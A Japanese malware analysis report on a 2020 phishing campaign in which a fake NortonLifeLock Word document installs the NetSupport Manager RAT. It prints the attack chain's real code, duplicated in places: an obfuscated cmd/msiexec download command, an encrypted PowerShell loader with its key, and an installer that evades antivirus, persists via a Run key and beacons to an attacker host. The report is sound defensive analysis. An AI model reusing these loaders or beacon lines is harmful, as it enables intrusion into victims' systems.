マルウェア

Cortex XDR™がNetSupport Manager RATをインストールする新たなフィッシング攻撃キャンペーンを検出

4 min read

概要

2020年1月、Unit 42は、パスワードで保護されたNortonLifelock文書を装う悪意のあるMicrosoft Word文書を特定しました。この文書は商用リモートアクセスツール（RAT）NetSupport Managerを配信するフィッシング攻撃キャンペーンに使われていました。私たちは、架空のNortonLifelock文書を使用してユーザーにマクロの有効化をうながすこの特異な攻撃に興味を引かれました。

通常だとこのRATは、管理者によるクライアントコンピュータへのリモートアクセスという正当な目的に利用されています。ただしこのケースでは、悪意のあるオペレータがRATを被害者のシステムにインストールして不正アクセスを可能にするために利用されていました。また、遅くとも2018年には、不正アクセスを意図してNetSupport Manager RATがフィッシング詐欺に利用されている様子が観察されています。

今回のレビューのきっかけとなったのは、Cortex XDR™エンジンによる検出でした。私たちは、Microsoft Office OutlookがあるMicrosoft Word文書を開いたことを発端にこの因果連鎖(causality chain。一連のイベントの流れ)が始まったことを確認しています。このほか、実際のメールこそ残っていなかったものの、このアクティビティがより大規模なフィッシング攻撃キャンペーンの一部であったことを結論付けることができました。

このアクティビティでは、動的解析・静的解析の両方に対する回避技術と、PowerShell PowerSploitフレームワークを利用して、当該アクティビティのための悪意のあるファイルをインストールしていました。また私たちは追加で行った分析から同キャンペーンに関連するアクティビティが2019年11月ごろにまで遡れることを特定しました。

本稿では、Cortex XDRの振る舞い検出機能を使って観測したこれら特異なアクティビティについて説明していきたいと思います。

配信

2020年1月初旬、Cortex XDR™エンジンは、難読化されたバッチファイルを実行する疑わしいプロセスwinword.exeを検出しました。次の図1で、Microsoft Wordプロセスの開始から.batファイルの作成・実行へと続く複数の検出ポイントを確認することができます。図2からは、タイムラインビューのロールアップ(まとめ)を見ることができますが、ここでは、既知の悪意のあるIoC、プロセス実行という振る舞い、接続試行アクティビティに対してアラートを表示しています。図3は、これらの振る舞いによるIocで検出した初期のアラートを示しています。

図1 Cortex XDRで因果連鎖(一連のイベント発生の因果関係を示したもの)を表示。まずMS Word が起動してマクロが実行され、その後バッチファイル alpaca.bat が生成され、msiexec が実行されて MSI ペイロードをダウンロードしている

図2 Cortex XDR™による因果連鎖のタイムライン。既知の悪意のあるIoC(赤い丸)、プロセス実行(黄色い丸)、外部への接続(Outgoing Connectionsの青い点) をまとめて確認できる

図3 Cortex XDR™によるBIOC(振る舞いに基づくIoC)が検出した内容

下の図4は攻撃に利用された悪意のある文書のスクリーンショットです。このケースでは、パスワードで保護された NortonLifelock文書を偽装し、マクロを有効化させるためにユーザーにパスワードを入力させようとします。今回の分析に使用した文書サンプルのSHA256値は次の通りです: E9440A5D2DFE2453AE5B69A9C096F8D4CF9E059D469C5DE67380D76E02DD6975

図4 NortonLifeLockを偽装した配信文書

ユーザーの目からは、当該の文書には個人情報が含まれていて、その表示にパスワードが必要であるかのように見えます。文書が開かれ、ユーザーが[コンテンツを有効にする]をクリックすると、マクロが実行され、ユーザーにパスワードのダイアログボックスが表示されます。

図5 ユーザーに表示されるパスワードのダイアログボックス

私たちはこのパスワードがフィッシングメール内で提供されていたであろうと推測しています。というのも、次のマクロコードが示すように、このパスワードには「c」または「C」の文字しか受け付けないからです。なお、このマクロコードのSHA256ハッシュ値は次の通りです: 68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2

スクリーンショットが含まれている画像自動的に生成された説明

ユーザーが誤ったパスワードを入力すると誤ったキーが入力されたことを示すエラーメッセージが表示され、その後「処理完了」を示すメッセージが表示されます。正しいキーが入力されるまでは、悪意のあるアクティビティが発生しない点にも注意してください。

さて、正しいパスワードを受け取ると、マクロはコード実行を継続し、次のコマンド文字列を組み立てます。

cmD /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et 
/p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" 
>>%temp%\alpaca.bat&EcHo|s^et /p=" 
http^:^/^/^quickwaysignstx[.]com/view.php 
">>%temp%\alpaca.bat&EcHo|s^et /p=" ^/q 
&exit">>%temp%\alpaca.bat&%temp%\alpaca.bat&avvfge 2

cmD /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et

/p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i"

>>%temp%\alpaca.bat&EcHo|s^et /p="

http^:^/^/^quickwaysignstx[.]com/view.php

">>%temp%\alpaca.bat&EcHo|s^et /p=" ^/q

&exit">>%temp%\alpaca.bat&%temp%\alpaca.bat&avvfge 2

このマクロは、Visual Basic for Applications（VBA）フォーム上のラベルを複数使って、すべての文字列を難読化しています。難読化された文字列には2つの文字が含まれていて、これらの文字同士を最後にリンクさせることで、被害端末にRATをダウンロード・実行するための最終コマンドを作成しています。

作成されたコマンド文字列は、VBAシェル関数経由で実行され、以下を行います。

/c パラメータつきでcmd.exeを起動し、作成したコマンド文字列を実行して終了する
alpaca.batという名前のバッチファイルを被害端末の%temp%ディレクトリに作成する
作成したバッチスクリプトを実行する

このバッチスクリプトにはmsiexecを使用します。このmsiexecはWindows Installerサービスの一部として含まれるもので、quickwaysignstx[.]com/view.php というドメインから被害端末にMicrosoft Intermediate Language（MSIL）バイナリをダウンロード・インストールするために使用されます。

このURLにブラウザでサイトにアクセスするとwebページ標準の画像が表示されます。このことから、view.phpをサービスしているサーバーは、User-Agent文字列でフィルタリングを行っているように見えます。なおこのドメインは、おそらくは攻撃者に侵害された正規のドメインと思われますので、この点には注意が必要です。

図6 quickwaysignstx[.]comのview.phpへのHTTP GETリクエスト

リクエスト内のUser-Agent文字列がWindowsインストーラならMSIファイルが返されます。このUser-Agent文字列はmsiexecコマンドの一部に含まれているので、このことからも「msiexecが使用された場合にのみペイロードがダウンロードされる」という推測がさらに裏付けられます。MSIペイロード（SHA256: 41D27D53C5D41003BC9913476A3AFD3961B561B120EE8BFDE327A5F0D22A040A）は、www.exemsi[.]comに「MPZMZQYVXOパッチバージョン5.1」という名前で提供されている未登録のバージョンを使ってビルドされています。

関連するアクティビティを分析していたおり、他のバージョンを示す文字列も複数見つかっていますので、このバージョン文字列はランダムであるようです。このバージョン文字列はMSIの実行時に表示されます。ダウンロードがすむと、MSIを/qパラメータつきで実行し、ユーザーからはWindowsダイアログが見えないようにします。同様のアクティビティは2019年11月にも報告があります。

MSIは被害端末の%temp%ディレクトリに、REgistryMPZMZQYVXO.ps1という名前のPowerSellスクリプトをインストールします。

function HYTNKJSDEH([String] $YTVRJKIEIR, [String] $BORBFDSYOP)
{
$DHPFYCOKLM = “<<strong>base64 encoded + encrypted payload</strong>>”;
$encoding = New-Object System.Text.ASCIIEncoding;
$KULVWNXDPId = $encoding.GetBytes("DJZGVUGVHDMNIGZD");
$derivedPass = New-Object 
System.Security.Cryptography.PasswordDeriveBytes($YTVRJKIEIR, 
$encoding.GetBytes($BORBFDSYOP), "SHA1", 2);
[Byte[]] $ESFLDIMUEO = $derivedPass.GetBytes(16);
$LCZJFEXHXR = New-Object 
System.Security.Cryptography.TripleDESCryptoServiceProvider;

$LCZJFEXHXR.Mode = 
[System.Security.Cryptography.CipherMode]::CBC;
$JOVGMJCIKY = $LCZJFEXHXR.CreateDecryptor($ESFLDIMUEO, $KULVWNXDPId);
$LBUWDFHHMZ = New-Object System.IO.MemoryStream($DHPFYCOKLMa, 
$True);
$ZSKXKODPKK = New-Object 
System.Security.Cryptography.CryptoStream($LBUWDFHHMZ, 
$JOVGMJCIKY, 
[System.Security.Cryptography.CryptoStreamMode]::Read);
$STDVLFIUQN = $ZSKXKODPKK.Read($JHTZWEZBUW, 0, 
$JHTZWEZBUW.Length);
$LBUWDFHHMZ.Close();
$ZSKXKODPKK.Close();
$LCZJFEXHXR.Clear();
if (($JHTZWEZBUW.Length -gt 3) -and ($JHTZWEZBUW[0] -eq 0xEF) 
-and ($JHTZWEZBUW[1] -eq 0xBB) -and ($JHTZWEZBUW[2] -eq 0xBF)) { 
$h = $JHTZWEZBUW[3..($JHTZWEZBUW.Length-1)]; }
return $encoding.GetString($JHTZWEZBUW).TrimEnd([Char] 0);
}
 $TYCNJNUWWG = HYTNKJSDEH "ew9p5rzlmvcf32b6i0oun8q47tag1xhs" 
"7ohp9z481qem6ykbdu2argt5lj3fcsi0";
Invoke-Expression $TYCNJNUWWG;

function HYTNKJSDEH([String] $YTVRJKIEIR, [String] $BORBFDSYOP)

{

$DHPFYCOKLM = “<base64 encoded + encrypted payload>”;

$encoding = New-Object System.Text.ASCIIEncoding;

$KULVWNXDPId = $encoding.GetBytes("DJZGVUGVHDMNIGZD");

$derivedPass = New-Object

System.Security.Cryptography.PasswordDeriveBytes($YTVRJKIEIR,

$encoding.GetBytes($BORBFDSYOP), "SHA1", 2);

[Byte[]] $ESFLDIMUEO = $derivedPass.GetBytes(16);

$LCZJFEXHXR = New-Object

System.Security.Cryptography.TripleDESCryptoServiceProvider;

$LCZJFEXHXR.Mode =

[System.Security.Cryptography.CipherMode]::CBC;

$JOVGMJCIKY = $LCZJFEXHXR.CreateDecryptor($ESFLDIMUEO, $KULVWNXDPId);

$LBUWDFHHMZ = New-Object System.IO.MemoryStream($DHPFYCOKLMa,

$True);

$ZSKXKODPKK = New-Object

System.Security.Cryptography.CryptoStream($LBUWDFHHMZ,

$JOVGMJCIKY,

[System.Security.Cryptography.CryptoStreamMode]::Read);

$STDVLFIUQN = $ZSKXKODPKK.Read($JHTZWEZBUW, 0,

$JHTZWEZBUW.Length);

$LBUWDFHHMZ.Close();

$ZSKXKODPKK.Close();

$LCZJFEXHXR.Clear();

if (($JHTZWEZBUW.Length -gt 3) -and ($JHTZWEZBUW[0] -eq 0xEF)

-and ($JHTZWEZBUW[1] -eq 0xBB) -and ($JHTZWEZBUW[2] -eq 0xBF)) {

$h = $JHTZWEZBUW[3..($JHTZWEZBUW.Length-1)]; }

return $encoding.GetString($JHTZWEZBUW).TrimEnd([Char] 0);

}

$TYCNJNUWWG = HYTNKJSDEH "ew9p5rzlmvcf32b6i0oun8q47tag1xhs"

"7ohp9z481qem6ykbdu2argt5lj3fcsi0";

Invoke-Expression $TYCNJNUWWG;

REgistryMPZMZQYVXO.ps1に保存されている暗号化されたblobデータは、NetSupport Manager RATを被害端末にインストールし、永続性を確保する役割を担う別のPowerShellスクリプトです。

なお、このPowerShellスクリプトは、PowerSploitフレームワークのOut-EncryptedScript.ps1というオープンソーススクリプトを使用して生成されたようです。このスクリプトには、base64で難読化された後Cipher Block Chain（CBC）暗号モードのTripleDESで暗号化されたblobデータが含まれています。

この特定サンプルの復号用パスワード(Decryption key)と初期化ベクトル（IV）は次のとおりです。

Decryption key = 0xA7A15B277A74CD3233B9DF078ABCDE12
IV = DJZGVUGVHDMNIGZD

なお、同サンプルで使用されているIVは、PowerSploitで生成した他のサンプルのIVとはおそらく異なる可能性が高いので、その点は注意してください。またIVブロックはサイズ長が8バイトなので、16バイトのIVは、8バイトに短縮されるものと思われます。復号したPowerShellスクリプトは次のようになります。

$scriptPath = split-path -parent 
$MyInvocation.MyCommand.Definition
if ($scriptpath -match "avast") {exit}
if ($scriptpath -match "Avast") {exit}
if ($scriptpath -match "AVG") {exit}
if ($scriptpath -match "avg") {exit}
function react (
  $source,
  $destination
)
{
Convert-StringToBinary -InputString $source -FilePath $Destination;
  #      }
     }#}
function Convert-StringToBinary
(
 $InputString
,  $FilePath
)
{
$file= $InputString
$data = [System.Convert]::FromBase64String($file)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null

$cs = New-Object System.IO.Compression.GZipStream($ms, 
[System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($cs)
$t = $sr.readtoend()#|out-file str.txt

$ByteArray = [System.Convert]::FromBase64String($t);
[System.IO.File]::WriteAllBytes($FilePath, $ByteArray);
}
function Install
{
$file1 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file2 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file3 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file4 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file5 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file6 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file7 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file8 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file9 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file10 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file11 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file12 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;

$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | 
Get-Random -Count 8 | % {[char]$_}) )
$fpath ="$env:appdata\$randf"
mkdir $fpath
$clientname="presentationhost.exe"
$Source = $file1
$Destination = "$fpath\"+"$clientname"
react -source $source -destination $destination
$Source = $file2
$Destination = "$fpath\client32.ini"
write-host $destination
react -source $source -destination $destination
$Source = $file3
$Destination = "$fpath\HTCTL32.DLL"
react -source $source -destination $destination
$Source = $file4
$Destination = "$fpath\msvcr100.dll"
react -source $source -destination $destination
$Source = $file5
$Destination = "$fpath\nskbfltr.inf"
react -source $source -destination $destination
$Source = $file6
$Destination = "$fpath\NSM.ini"
react -source $source -destination $destination
$Source = $file7
$Destination = "$fpath\NSM.lic"
react -source $source -destination $destination
$Source = $file8
$Destination = "$fpath\pcicapi.dll"
react -source $source -destination $destination
$Source = $file9
$Destination = "$fpath\PCICHEK.DLL"
react -source $source -destination $destination
$Source = $file10
$Destination = "$fpath\PCICL32.DLL"
react -source $source -destination $destination
$Source = $file11
$Destination = "$fpath\remcmdstub.exe"
react -source $source -destination $destination
$Source = $file12
$Destination = "$fpath\TCCTL32.DLL"
react -source $source -destination $destination
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ServiceDLL /t REG_SZ /d "$fpath\$clientname" /f
start-process "$fpath\$clientname"
#Start-sleep -s 10
Invoke-WebRequest -Uri "http://afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername"
$f=get-content $env:temp\insghha4.txt

remove-item $env:TEMP\*.ps1
#cmd /c del %temp%\*.ps1 /f
#cmd /c del %temp%\*.txt /f
remove-item $f
}
#ShowConsole
#rights

install;

100

101

102

103

104

105

106

$scriptPath = split-path -parent

$MyInvocation.MyCommand.Definition

if ($scriptpath -match "avast") {exit}

if ($scriptpath -match "Avast") {exit}

if ($scriptpath -match "AVG") {exit}

if ($scriptpath -match "avg") {exit}

function react (

$source,

$destination

)

{

Convert-StringToBinary -InputString $source -FilePath $Destination;

# }

}#}

function Convert-StringToBinary

(

$InputString

, $FilePath

)

{

$file= $InputString

$data = [System.Convert]::FromBase64String($file)

$ms = New-Object System.IO.MemoryStream

$ms.Write($data, 0, $data.Length)

$ms.Seek(0,0) | Out-Null

$cs = New-Object System.IO.Compression.GZipStream($ms,

[System.IO.Compression.CompressionMode]::Decompress)

$sr = New-Object System.IO.StreamReader($cs)

$t = $sr.readtoend()#|out-file str.txt

$ByteArray = [System.Convert]::FromBase64String($t);

[System.IO.File]::WriteAllBytes($FilePath, $ByteArray);

}

function Install

{

$file1 = “<Gzip compressed + base64 encoded file>”;

$file2 = “<Gzip compressed + base64 encoded file>”;

$file3 = “<Gzip compressed + base64 encoded file>”;

$file4 = “<Gzip compressed + base64 encoded file>”;

$file5 = “<Gzip compressed + base64 encoded file>”;

$file6 = “<Gzip compressed + base64 encoded file>”;

$file7 = “<Gzip compressed + base64 encoded file>”;

$file8 = “<Gzip compressed + base64 encoded file>”;

$file9 = “<Gzip compressed + base64 encoded file>”;

$file10 = “<Gzip compressed + base64 encoded file>”;

$file11 = “<Gzip compressed + base64 encoded file>”;

$file12 = “<Gzip compressed + base64 encoded file>”;

$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) |

Get-Random -Count 8 | % {[char]$_}) )

$fpath ="$env:appdata\$randf"

mkdir $fpath

$clientname="presentationhost.exe"

$Source = $file1

$Destination = "$fpath\"+"$clientname"